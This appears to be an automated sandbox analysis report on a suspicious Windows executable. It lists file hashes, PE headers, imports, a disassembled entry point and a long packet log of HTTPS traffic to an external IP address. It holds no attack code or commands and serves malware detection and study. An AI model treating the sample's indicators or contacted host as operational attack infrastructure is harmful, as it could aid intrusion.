                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...............................................F...........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                Entropy (8bit):0.08121435698808738
                                TrID:
                                • Win64 Executable GUI (202006/5) 92.65%
                                • Win64 Executable (generic) (12005/4) 5.51%
                                • Generic Win/DOS Executable (2004/3) 0.92%
                                • DOS Executable Generic (2002/1) 0.92%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:287438657364-7643738421.08.exe
                                File size:30'886'912 bytes
                                MD5:12771744b7de8ffb1f0dddf3ac8ed2f4
                                SHA1:c05938c681c3c840a9e484bed33c48fcd033dd27
                                SHA256:4df10f78a78892fea0c94ef9aca83ddac4045a1b2bec807f4bf563ac14551224
                                SHA512:d4ec616cb51388ac364bf6d5abbf2dfe25010f8fdcbd5ae8d90e6b79a9789ca76006432f903355305a95d4730955762113c8b4471227b42823a87ddd83ce375e
                                SSDEEP:3072:Y+JwGTjkeMwWO4Y7gDRq1OLNjXlQSupp:ZJTjkDwWNYLItXtcp
                                TLSH:6D671615262000A5F71A87348956F9D0A6A67C794BE4E2CFE2387D3ADE321C3593B61F
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............._..._..._..._..._..._..._..5_..._..8_..._..._..._..._..._..p_..._..6_..._Rich..._................PE..d.....XZ..........#

                                File Icon

                                Icon Hash:8a80809292808001

                                Static PE Info

                                General

                                Entrypoint:0x140004e80
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x140000000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x5A587FC5 [Fri Jan 12 09:28:37 2018 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:2
                                File Version Major:5
                                File Version Minor:2
                                Subsystem Version Major:5
                                Subsystem Version Minor:2
                                Import Hash:31cc4901c4470c461b7b4afe57ed63f3

                                Entrypoint Preview

                                Instruction
                                dec eax
                                sub esp, 28h
                                call 00007F9045264AA4h
                                dec eax
                                add esp, 28h
                                jmp 00007F904525ED36h
                                int3
                                int3
                                dec eax
                                mov dword ptr [esp+08h], ecx
                                dec eax
                                sub esp, 00000088h
                                dec eax
                                lea ecx, dword ptr [0000D4B9h]
                                call dword ptr [000082E3h]
                                dec eax
                                mov eax, dword ptr [0000D5A4h]
                                dec eax
                                mov dword ptr [esp+58h], eax
                                inc ebp
                                xor eax, eax
                                dec eax
                                lea edx, dword ptr [esp+60h]
                                dec eax
                                mov ecx, dword ptr [esp+58h]
                                call 00007F904526A1F6h
                                dec eax
                                mov dword ptr [esp+50h], eax
                                dec eax
                                cmp dword ptr [esp+50h], 00000000h
                                je 00007F9045262B93h
                                dec eax
                                mov dword ptr [esp+38h], 00000000h
                                dec eax
                                lea eax, dword ptr [esp+48h]
                                dec eax
                                mov dword ptr [esp+30h], eax
                                dec eax
                                lea eax, dword ptr [esp+40h]
                                dec eax
                                mov dword ptr [esp+28h], eax
                                dec eax
                                lea eax, dword ptr [0000D464h]
                                dec eax
                                mov dword ptr [esp+20h], eax
                                dec esp
                                mov ecx, dword ptr [esp+50h]
                                dec esp
                                mov eax, dword ptr [esp+58h]
                                dec eax
                                mov edx, dword ptr [esp+60h]
                                xor ecx, ecx
                                call 00007F904526A1A4h
                                jmp 00007F9045262B74h
                                dec eax
                                mov eax, dword ptr [esp+00000088h]
                                dec eax
                                mov dword ptr [0000D530h], eax
                                dec eax
                                lea eax, dword ptr [esp+00000088h]
                                dec eax
                                add eax, 08h
                                dec eax
                                mov dword ptr [0000D4BDh], eax
                                dec eax
                                mov eax, dword ptr [0000D516h]
                                dec eax
                                mov dword ptr [0000D387h], eax

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xf9040x50.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d6f0000xc088.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d6e0000x858.pdata
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d7c0000x160.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0xd3b00x1c.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0xd0000x338.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000xb7760xb8007562aea4300b0a660a5939f140fe62b6False0.516007133152174data6.198028056797998IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0xd0000x33c60x340010fbb23f485a7b3126f7bd500efc4e97False0.36478365384615385data4.729795884700604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x110000x1d5c8400x1d58c009a3be4c4122c6caa02f074abffb2f21funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .pdata0x1d6e0000x8580xa00944d1977c688c60d0d795e2506ac3238False0.41875data3.893632257077923IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .rsrc0x1d6f0000xc0880xc2008a3ee32d65f93c0456a6a64a275d151bFalse0.12808070231958762data4.363440716953925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x1d7c0000x34a0x400afef91ea5ec9e1735d279b4047d87ed6False0.279296875data2.4933342466924753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x1d6f5080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.14650537634408603
                                RT_ICON0x1d6f7f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.30405405405405406
                                RT_ICON0x1d6f9180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.3070362473347548
                                RT_ICON0x1d707c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.4842057761732852
                                RT_ICON0x1d710680x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.3670520231213873
                                RT_ICON0x1d715d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.1087136929460581
                                RT_ICON0x1d73b780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.23170731707317074
                                RT_ICON0x1d74c200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.3599290780141844
                                RT_ICON0x1d750880x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.14650537634408603
                                RT_ICON0x1d753700x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.30405405405405406
                                RT_ICON0x1d754980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.3070362473347548
                                RT_ICON0x1d763400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.4842057761732852
                                RT_ICON0x1d76be80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.3670520231213873
                                RT_ICON0x1d771500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.1087136929460581
                                RT_ICON0x1d796f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.23170731707317074
                                RT_ICON0x1d7a7a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.3599290780141844
                                RT_MENU0x1d7ac080x8edataEnglishUnited States0.6971830985915493
                                RT_DIALOG0x1d7ac980x150dataEnglishUnited States0.5833333333333334
                                RT_STRING0x1d7ade80x42dataEnglishUnited States0.6363636363636364
                                RT_ACCELERATOR0x1d7ae2c0x10dataEnglishUnited States1.25
                                RT_GROUP_ICON0x1d7ae3c0x76dataEnglishUnited States0.6440677966101694
                                RT_GROUP_ICON0x1d7aeb40x76dataEnglishUnited States0.6610169491525424
                                RT_MANIFEST0x1d7af2c0x15aASCII text, with CRLF line terminatorsEnglishUnited States0.5491329479768786

                                Imports

                                DLLImport
                                KERNEL32.dllCreateMutexW, GetLastError, OutputDebugStringW, SetProcessShutdownParameters, ReleaseMutex, GetCommandLineW, GetModuleFileNameW, LoadLibraryW, GetProcAddress, FreeLibrary, WritePrivateProfileStringW, GetSystemDirectoryW, CreateFileW, CloseHandle, ExitProcess, CreateThread, OpenFileMappingW, MapViewOfFile, GetStdHandle, OpenProcess, WaitForSingleObject, FlushFileBuffers, HeapSize, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, WriteConsoleW, SetStdHandle, MultiByteToWideChar, Sleep, HeapFree, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, LeaveCriticalSection, EnterCriticalSection, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, SetFilePointer, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, GetModuleHandleW, WriteFile, RtlUnwindEx, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, HeapSetInformation, GetVersion, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, VirtualAlloc
                                USER32.dllSendMessageW, FindWindowW, MessageBoxW, EndDialog, PostQuitMessage, EndPaint, BeginPaint, DefWindowProcW, DestroyWindow, UpdateWindow, ShowWindow, CreateWindowExW, RegisterClassExW, LoadCursorW, LoadIconW, DispatchMessageW, TranslateMessage, TranslateAcceleratorW, GetMessageW, LoadAcceleratorsW, LoadStringW, DialogBoxParamW
                                SHELL32.dllSHCreateDirectoryExW, SHGetFolderPathW, CommandLineToArgvW

                                Possible Origin

                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 7, 2025 04:15:31.094289064 CET49708443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:31.094336987 CET4434970839.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:31.094436884 CET49708443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:31.134723902 CET49708443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:31.134752035 CET4434970839.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:32.375957012 CET4434970839.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:32.376142025 CET49708443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:32.376801968 CET4434970839.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:32.376866102 CET49708443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:32.458097935 CET49708443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:32.458137035 CET4434970839.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:32.458538055 CET4434970839.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:32.461134911 CET49708443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:32.464088917 CET49708443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:32.507342100 CET4434970839.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:32.784462929 CET4434970839.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:32.784557104 CET4434970839.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:32.784585953 CET49708443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:32.784625053 CET49708443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:32.791194916 CET49708443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:32.791217089 CET4434970839.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:32.898245096 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:32.898283958 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:32.898376942 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:32.898647070 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:32.898658037 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.112071037 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.112207890 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.112827063 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.112838984 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.113066912 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.113080978 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.444412947 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.444437981 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.444492102 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.444504976 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.444519997 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.444552898 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.444926023 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.444981098 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.445472002 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.445540905 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.446089029 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.446146965 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.531137943 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.531197071 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.531264067 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.531275034 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.531429052 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.531429052 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.533062935 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.533128023 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.533343077 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.533397913 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.533602953 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.533651114 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.533833981 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.533889055 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.534065008 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.534151077 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.534928083 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.534980059 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.535007954 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.535058022 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.618067026 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.618123055 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.618196964 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.618208885 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.618253946 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.618274927 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.618480921 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.618583918 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.618707895 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.618766069 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.618781090 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.618851900 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.619740963 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.619786024 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.619817972 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.619824886 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.619885921 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.619885921 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.620482922 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.620554924 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.621181965 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.621227980 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.621241093 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.621247053 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.621284008 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.621320009 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.622145891 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.622191906 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.622204065 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.622210979 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.622270107 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.623079062 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.623121977 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.623143911 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.623150110 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.623164892 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.623203039 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.624022961 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.624084949 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.704840899 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.704891920 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.704972029 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.704996109 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.705012083 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.705041885 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.705070972 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.705117941 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.705121040 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.705132008 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.705168962 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.705300093 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.705353022 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.705415010 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.705459118 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.705465078 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.705482960 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.705504894 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.705527067 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.726413012 CET49709443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.726430893 CET4434970939.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.760814905 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.760900021 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:34.760992050 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.761221886 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:34.761244059 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:35.997982979 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:35.998172998 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:35.998789072 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:35.998810053 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:35.999011040 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:35.999017000 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.328872919 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.328907013 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.329022884 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.329052925 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.329102993 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.329396963 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.329457045 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.330734968 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.330809116 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.334475040 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.334547997 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.420346022 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.420494080 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.420672894 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.420743942 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.420838118 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.420897007 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.421647072 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.421689987 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.421724081 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.421753883 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.421777010 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.421797991 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.422611952 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.422691107 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.424171925 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.424209118 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.424237967 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.424263954 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.424283028 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.424299955 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.425950050 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.426026106 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.511885881 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.512013912 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.512104034 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.512161016 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.512878895 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.512912989 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.512936115 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.512948990 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.512960911 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.512985945 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.513422012 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.513483047 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.513616085 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.513657093 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.513669014 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.513674974 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.513695955 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.513705015 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.513724089 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.513726950 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.513748884 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.513775110 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.514287949 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.514332056 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.514343977 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.514352083 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.514373064 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.514398098 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.514411926 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.514434099 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.514439106 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.514457941 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.514466047 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.514472961 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.514478922 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.514513016 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.515609980 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.515659094 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.517978907 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.518023968 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.518047094 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.518054008 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.518079042 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.518095016 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.604499102 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.604559898 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.604631901 CET4434971039.103.20.48192.168.2.8
                                Jan 7, 2025 04:15:36.604631901 CET49710443192.168.2.839.103.20.48
                                Jan 7, 2025 04:15:36.604686022 CET49710443192.168.2.839.103.20.48
